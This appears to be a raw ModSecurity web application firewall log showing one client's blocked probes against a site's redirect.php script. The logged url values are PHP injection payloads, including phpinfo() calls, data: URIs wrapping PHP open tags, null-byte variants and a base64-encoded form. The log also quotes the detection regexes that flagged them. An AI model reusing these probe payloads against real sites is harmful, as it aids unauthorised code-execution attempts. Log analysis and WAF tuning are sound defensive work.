[hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XwAAAVA"]
[Tue May 12 05:06:14.667056 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XwAAAVA"]
[Tue May 12 05:06:14.667307 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: High-Risk PHP Function Call Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XwAAAVA"]
[Tue May 12 05:06:14.763115 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "174"] [id "933160"] [rev "1"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: phpinfo();phpinfo() found within ARGS:url: phpinfo();phpinfo();"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68YAAAAVA"]
[Tue May 12 05:06:14.763827 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68YAAAAVA"]
[Tue May 12 05:06:14.764112 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: High-Risk PHP Function Call Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68YAAAAVA"]
[Tue May 12 05:06:14.860052 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "174"] [id "933160"] [rev "1"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: phpinfo()|phpinfo() found within ARGS:url: phpinfo()|phpinfo()"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68YQAAAVA"]
[Tue May 12 05:06:14.860602 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68YQAAAVA"]
[Tue May 12 05:06:14.860867 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: High-Risk PHP Function Call Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68YQAAAVA"]
[Tue May 12 05:06:14.956759 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "174"] [id "933160"] [rev "1"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: phpinfo()|phpinfo()|phpinfo() found within ARGS:url: phpinfo()|phpinfo()|phpinfo()"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68YgAAAVA"]
[Tue May 12 05:06:14.957289 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68YgAAAVA"]
[Tue May 12 05:06:14.957554 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: High-Risk PHP Function Call Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68YgAAAVA"]
[Tue May 12 05:06:15.052927 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:url: data:,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68YwAAAVA"]
[Tue May 12 05:06:15.053534 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:, found within ARGS:url: data:,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68YwAAAVA"]
[Tue May 12 05:06:15.053914 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68YwAAAVA"]
[Tue May 12 05:06:15.054127 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68YwAAAVA"]
[Tue May 12 05:06:15.149552 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZAAAAVA"]
[Tue May 12 05:06:15.149595 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZAAAAVA"]
[Tue May 12 05:06:15.149822 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:url: data:,<?php phpinfo(); ?>\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZAAAAVA"]
[Tue May 12 05:06:15.150040 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:, found within ARGS:url: data:,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZAAAAVA"]
[Tue May 12 05:06:15.150403 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZAAAAVA"]
[Tue May 12 05:06:15.150617 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZAAAAVA"]
[Tue May 12 05:06:15.246301 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:url: data:text/plain,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZQAAAVA"]
[Tue May 12 05:06:15.246535 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:text/plain, found within ARGS:url: data:text/plain,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZQAAAVA"]
[Tue May 12 05:06:15.246946 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZQAAAVA"]
[Tue May 12 05:06:15.247186 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZQAAAVA"]
[Tue May 12 05:06:15.342314 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZgAAAVA"]
[Tue May 12 05:06:15.342360 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZgAAAVA"]
[Tue May 12 05:06:15.342587 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:url: data:text/plain,<?php phpinfo(); ?>\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZgAAAVA"]
[Tue May 12 05:06:15.342785 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:text/plain, found within ARGS:url: data:text/plain,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZgAAAVA"]
[Tue May 12 05:06:15.343162 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZgAAAVA"]
[Tue May 12 05:06:15.343382 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZgAAAVA"]
[Tue May 12 05:06:15.439187 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: ;base64 found within ARGS:url: data:;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZwAAAVA"]
